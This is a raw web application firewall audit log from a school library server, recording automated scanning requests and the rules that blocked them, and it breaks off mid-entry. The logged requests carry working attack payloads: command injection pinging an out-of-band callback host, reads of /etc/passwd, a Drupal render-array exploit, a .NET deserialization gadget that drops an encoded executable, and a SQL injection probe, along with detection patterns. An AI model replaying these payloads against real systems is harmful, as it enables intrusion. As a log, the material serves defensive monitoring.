Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb37861e-Z-- --59027e5c-A-- [27/May/2025:01:26:58 +0700] aDSycnFOzWd_Ai7zJXUfmAAAABc 103.236.140.4 48722 103.236.140.4 8181 --59027e5c-B-- POST /soap.cgi?service=whatever-control;curl HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 16 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 Content-Type: text/xml SOAPAction: "whatever-serviceType#whatever-action" X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168940806 --59027e5c-C-- whatever-content --59027e5c-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --59027e5c-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748284018103031 5776 (- - -) Stopwatch2: 1748284018103031 5776; combined=4672, p1=373, p2=4205, p3=32, p4=33, p5=29, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59027e5c-Z-- --5fff034a-A-- [27/May/2025:01:26:58 +0700] aDSycnFOzWd_Ai7zJXUfmgAAABU 103.236.140.4 48730 103.236.140.4 8181 --5fff034a-B-- GET /card_scan.php?No=30&ReaderNo=%60ping%20d0q9cd1gpeook7mlf7sgbyz3j4ai5t3w3.oast.live%60 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168940809 --5fff034a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5fff034a-E-- --5fff034a-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: `ping found within ARGS:ReaderNo: `ping d0q9cd1gpeook7mlf7sgbyz3j4ai5t3w3.oast.live`"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748284018120160 1692 (- - -) Stopwatch2: 1748284018120160 1692; combined=558, p1=354, p2=176, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fff034a-Z-- --1e390a50-A-- [27/May/2025:01:26:59 +0700] aDSyc_7lSIOiZEhmvSzydgAAAEg 103.236.140.4 48762 103.236.140.4 8181 --1e390a50-B-- POST /password_change.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 73 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168940812 --1e390a50-C-- user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2 --1e390a50-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e390a50-E-- --1e390a50-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /password_change.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748284019099508 2046 (- - -) Stopwatch2: 1748284019099508 2046; combined=511, p1=338, p2=154, p3=0, p4=0, p5=19, sr=49, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e390a50-Z-- --59f8853f-A-- [27/May/2025:01:27:00 +0700] aDSydFSmKJQK-9oQ9STpoAAAAIM 103.236.140.4 48796 103.236.140.4 8181 --59f8853f-B-- POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.0 Referer: perpustakaan.smkn22jakarta.sch.id/user/register Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 631 User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/113.0 Safari/537.36 Accept: application/json Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663 X-Requested-With: XMLHttpRequest X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168900285 --59f8853f-C-- -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#post_render][]" passthru -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#type]" markup -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#markup]" cat /etc/passwd -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="form_id" user_register_form -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="_drupal_ajax" --59f8853f-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --59f8853f-E-- --59f8853f-H-- Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748284020100750 5636 (- - -) Stopwatch2: 1748284020100750 5636; combined=4025, p1=398, p2=3529, p3=31, p4=35, p5=32, sr=63, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59f8853f-Z-- --6be1b870-A-- [27/May/2025:01:27:00 +0700] aDSydP7lSIOiZEhmvSzyeAAAAEI 103.236.140.4 48804 103.236.140.4 8181 --6be1b870-B-- POST /xmlpserver/ReportTemplateService.xls HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 96 User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: text/xml; charset=UTF-8 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168940818 --6be1b870-C-- --6be1b870-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --6be1b870-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748284020120189 4248 (- - -) Stopwatch2: 1748284020120189 4248; combined=2928, p1=338, p2=2521, p3=21, p4=23, p5=25, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6be1b870-Z-- --e3cd9109-A-- [27/May/2025:01:27:01 +0700] aDSydc-W3hHsdQpQwdTUigAAAMg 103.236.140.4 48844 103.236.140.4 8181 --e3cd9109-B-- POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 8004 User-Agent: Mozilla/5.0 (Debian; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168852898 --e3cd9109-C-- stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e --e3cd9109-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3cd9109-E-- --e3cd9109-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)((?:\\bx(?:link:href|html|mlns)|!ENTITY\\b.{0,399}?\\b(?:SYSTEM|PUBLIC)|\\bdata:text\\/html))" at ARGS:stagingTaskData. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "170"] [id "213060"] [rev "7"] [msg "COMODO WAF: XSS Filter - Category 3: Attribute Vector||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748284021120803 9495 (- - -) Stopwatch2: 1748284021120803 9495; combined=8098, p1=331, p2=7747, p3=0, p4=0, p5=20, sr=47, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3cd9109-Z-- --62cd3267-A-- [27/May/2025:01:29:24 +0700] aDSzBP7lSIOiZEhmvSzz5AAAAFg 103.236.140.4 52714 103.236.140.4 8181 --62cd3267-B-- POST /cgi-bin/supportInstaller HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 83 User-Agent: MSIE Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168852907 --62cd3267-C-- fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0-- --62cd3267-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62cd3267-E-- --62cd3267-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b 